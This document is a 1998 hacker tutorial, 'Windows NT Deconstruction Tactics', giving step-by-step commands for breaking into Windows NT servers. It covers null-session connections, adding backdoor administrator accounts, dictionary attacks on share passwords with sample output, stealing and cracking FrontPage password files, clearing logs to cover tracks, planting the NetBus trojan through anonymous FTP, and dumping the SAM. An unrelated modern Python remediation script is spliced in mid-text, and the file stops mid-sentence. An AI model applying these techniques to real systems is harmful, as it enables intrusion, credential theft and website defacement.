Windows NT Deconstruction Tactics
Step by Step NT Exploitation Techniques
by vacuum of Rhino9 & Technotronic
vacuum@technotronic.com
Revision 5 10/01/98

Changes in Revision 5:
Refined some NET.EXE examples.
Included brief discussion of NetBus.
Samba rdisk /s information.
Made this .zip more like a unix rootkit by including all the mentioned tools.
Cleaned up the overall layout.

I.   Initial Access Strategy
     1.) NetBIOS Shares Using Microsoft Executables
         a. NET.EXE's other uses
     2.) NAT The NetBIOS Auditing Tool
II.  FrontPage Exploitation
     1.) FrontPage password decryption on unix servers with frontpage extensions.
III. Registry Vulnerabilities
     1.) rdisk /s to dump the SAM (Security Account Manager)
     2.) gaining access to the registry with the AT.EXE command (local)
     3.) REGEDT32.EXE and REGEDIT.EXE
     4.) REGINI.EXE and REGDMP.EXE remote registry editing tools
     5.) Using the Registry to Execute Malicious Code
IV.  Trojan .lnk (shortcuts)
     1.) Security hole within winnt\profiles and login scripts
V.   Workarounds for common system policy restrictions
VI.  PWDUMP Example

Included Files:
NTExploits.txt   this document
samproof.txt     example of the sam hive from the registry
notepad.reg      Example .reg file that starts up notepad.exe upon login.
                 Could be any executable.
service.pwd      Service.pwd frontpage password example.


NetBIOS Shares Using the standard Microsoft Executables

C:\>NBTSTAT -A 123.123.123.123
C:\>NBTSTAT -a www.target.com

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1        <20>  UNIQUE      Registered
STUDENT1        <00>  UNIQUE      Registered
DOMAIN1         <00>  GROUP       Registered
DOMAIN1         <1C>  GROUP       Registered
DOMAIN1         <1B>  UNIQUE      Registered
STUDENT1        <03>  UNIQUE      Registered
DOMAIN1         <1E>  GROUP       Registered
DOMAIN1         <1D>  UNIQUE      Registered
..__MSBROWSE__. <01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D

After a NetBIOS share is found, it can be added to the LMHOSTS file.

Computername    <03>  UNIQUE      Registered by the messenger service.
This is the computername to be added to the LMHOSTS file, which is not
necessary to use NAT.EXE but is necessary if you would like to view the
remote computer in Network Neighborhood.

Example of LMHOSTS file:

123.123.123.123  student1
24.3.9.12        target2

Now you can use the find computer options within NT or 95 to browse the
shares.

An alternative option would be to use the very powerful NET.EXE

C:\>net view 123.123.123.123
C:\>net view \\student1

Shared resources at 123.123.123.123

Share name   Type         Used as  Comment
------------------------------------------------------------------------------
NETLOGON     Disk                  Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$ ADMIN$ and IPC$ shares are hidden and are not shown.

To connect to the ipc$ using a null session:

C:\>net use \\111.111.111.111\ipc$ "" /user:""
The command completed successfully.

To connect to a normal share:

C:\>net use x: \\123.123.123.123\test
The command completed successfully.

Now the command prompt or the NT Explorer can be used to access the remote
drive X:

C:\>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           X:        \\123.123.123.123\test    Microsoft Windows Network
OK                     \\123.123.123.123\test    Microsoft Windows Network
The command completed successfully.

Here are some other interesting things that NET.EXE can be used for that are
not related to NetBIOS.

NET localgroup
  will show which groups have been created on the local machine.
NET name
  will show you the name of the computer as well as who is logged in.
NET accounts
  will show the password restrictions for the user.
NET share
  displays the shares for the local machine including the $ shares which
  are supposed to be hidden.
NET share unsecure=c:\
  will share the c:\ as unsecure
NET user
  will show you which accounts are created on the local machine.
NET user unsecure elite /add
  will add user unsecure with a password of elite.
NET start SERVICE
NET start schedule
  will start the schedule service which can be used to access the complete
  registry on a local machine.
NET group
NET group Administrators unsecure /add
  will add the user unsecure to the Administrators group if run on a
  Domain Controller.


NAT (NetBIOS Auditing Tool)

This technique works with the default share type, Everyone/Full Control.
If you are denied access, permissions have been applied to the share, and a
password will be required.

NAT.EXE (NetBIOS Auditing Tool)

NAT.EXE [-o filename] [-u userlist] [-p passlist]
OPTIONS
     -o   Specify the output file. All results from the scan will be
          written to the specified file, in addition to standard output.

     -u   Specify the file to read usernames from. Usernames will be read
          from the specified file when attempting to guess the password on
          the remote server. Usernames should appear one per line in the
          specified file.

     -p   Specify the file to read passwords from. Passwords will be read
          from the specified file when attempting to guess the password on
          the remote server. Passwords should appear one per line in the
          specified file.
          Addresses should be specified in comma delimited format, with no
          spaces. Valid address specifications include:

          hostname - "hostname" is added
          127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3
          127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3
          127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3,
              127.0.0.7, 127.0.0.10 through 127.0.0.20.
          hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through
              127.0.0.1

          All combinations of hostnames and address ranges as specified
          above are valid.

NAT.EXE does all of the above techniques plus it will try Administrative
shares ($), scan a range of IP addresses and use a dictionary file to crack
the NetBIOS passwords. NAT.EXE is the tool preferred by most hackers.

C:\>nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$         Disk:     Remote Admin
        C$             Disk:     Default share
        IPC$           IPC:      Remote IPC
        NETLOGON       Disk:     Logon server share
        Test           Disk:

[*]--- This machine has a browse list:

        Server               Comment
        ---------            -------
        STUDENT1

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

If the share has the default permissions of Everyone/Full Control, you are
done: it is hacked.


FrontPage Exploitation:

Most frontpage exploits compromise only the wwwroot directory and can be
used to change the html of a site, which has become a popular method of
gaining fame in the hacker community.
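Read from the administrator's side, the NAT report in the previous section is a list of accounts and shares to fix. The following added example (not part of the original text or of NAT itself) parses a report in the format shown there and turns it into remediation items; the sample report is constructed and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample in the NAT report format shown above (not a real scan).
SAMPLE_REPORT = r"""
[*]--- Checking host: 204.73.131.11
[*]--- Was not able to establish session with no password
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
"""

HOST = re.compile(r"Checking host: (\S+)")
CRED = re.compile(r"CONNECTED: Username: `([^']*)' Password: `([^']*)'")
READ = re.compile(r"WARNING: Able to access share: \\\\[^\\]+\\(\S+)")
WRITE = re.compile(r"WARNING: Directory is writeable: \\\\[^\\]+\\(\S+)")

def triage(report):
    """Return {host: {"guessed": [...], "readable": [...], "writable": [...]}}."""
    hosts = defaultdict(lambda: {"guessed": [], "readable": [], "writable": []})
    current = None
    for line in report.splitlines():
        if m := HOST.search(line):
            current = m.group(1)
        elif current is None:
            continue  # ignore anything before the first host header
        elif m := CRED.search(line):
            hosts[current]["guessed"].append(m.group(1))  # keep the account, drop the password
        elif m := READ.search(line):
            hosts[current]["readable"].append(m.group(1))
        elif m := WRITE.search(line):
            hosts[current]["writable"].append(m.group(1))
    return dict(hosts)

def findings(report):
    """One remediation line per problem: passwords, writable shares, readable shares."""
    out = []
    for host, r in sorted(triage(report).items()):
        out += [f"{host}: reset weak password for {u}" for u in r["guessed"]]
        out += [f"{host}: {s} is writable, tighten share ACL" for s in r["writable"]]
        out += [f"{host}: {s} is readable, review share ACL"
                for s in r["readable"] if s not in r["writable"]]
    return out

if __name__ == "__main__":
    print("\n".join(findings(SAMPLE_REPORT)))
```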
The following is a list of the Internet Information Server file locations
in relation to the local hard drive (C:) and the web (www.target.com)

C:\InetPub\wwwroot
C:\InetPub\scripts                                  /Scripts
C:\InetPub\wwwroot\_vti_bin                         /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm                /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut                /_vti_bin/_vti_aut
C:\InetPub\cgi-bin                                  /cgi-bin
C:\InetPub\wwwroot\srchadm                          /srchadm
C:\WINNT\System32\inetserv\iisadmin                 /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM      Internet Information Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm   /iisadmin/isadmin

http://localhost:8814/iisadmin/iisnew.asp where 8814 is a randomly chosen
port. By default only localhost (127.0.0.1) has access to the html version
of Internet Server Manager (HTML).

Using FrontPage, a hacker may alter the html of a remote website; often
frontpage webs are left un-passworded.

On the FrontPage Explorer's File menu, choose Open FrontPage Web.
In the Getting Started dialog box, select Open an Existing FrontPage Web
and choose the FrontPage web you want to open.
Click More Webs if the web you want to open is not listed.
Click OK.
If you are prompted for your author name and password, you will have to
decrypt service.pwd, guess or move on.
Enter them in the Name and Password Required dialog box, and click OK.
Alter the existing page, or upload a page of your own.

Scanning PORT 80 (http) or 443 (https) options:

GET /_vti_inf.html             #Ensures that frontpage server extensions are installed.
GET /_vti_pvt/service.pwd      #Contains the encrypted password files. Not used on IIS and WebSite servers
GET /_vti_pvt/authors.pwd      #On Netscape servers only. Encrypted names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log       #If author.log is there it will need to be cleaned to cover your tracks
GET /samples/search/queryhit.htm

Other ways of obtaining service.pwd

http://ftpsearch.com/index.html search for service.pwd
http://www.altavista.digital.com advanced search for link:"/_vti_pvt/service.pwd"

Attempt to connect to the server using FTP.

port 21
login anonymous
password guest@unknown

The anonymous login will use the internally created IISUSR_computername
account to assign NT permissions. An incorrect configuration may leave areas
vulnerable to attack.

If you find a writeable anonymous ftp account, copy any executables (Netbus
for example) to the c:\inetpub\scripts\ directory. The permissions on the
scripts directory are as follows: Execute (including script). This is
valuable, allowing you to http://www.target.com/scripts/patch.exe

If service.pwd is obtained it will look similar to this:

Vacuum:SGXJVl6OJ9zkE

The above password is apple

Turn it into DES format:

Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

Then run your favorite unix password cracker like john.exe (John The Ripper)
against a large dictionary file, or ntucrack.exe, which will brute force
crack the password.


Registry Vulnerabilities:

RDISK

rdisk /s will dump the security and sam portions of the registry into the
c:\winnt\repair directory. It will also give you the option of creating an
emergency repair diskette. This .zip includes SAMDUMP.EXE which can be used
to extract passwords from emergency repair diskettes.

Within that directory there will be a sam._ file. It is ethically used for
the emergency repair disk. If you have gained access to the local drive
through physical access or through netbios shares, run rdisk /s

There is a utility called SAMDUMP included within this .zip that will
extract the passwords.

GAINING ACCESS TO THE ENTIRE REGISTRY (Local)

For this to work, you will need to start the schedule service.
From the Command Prompt:

C:\>net start schedule
The Schedule service is starting.
The Schedule service was started successfully.

From a Command Prompt: at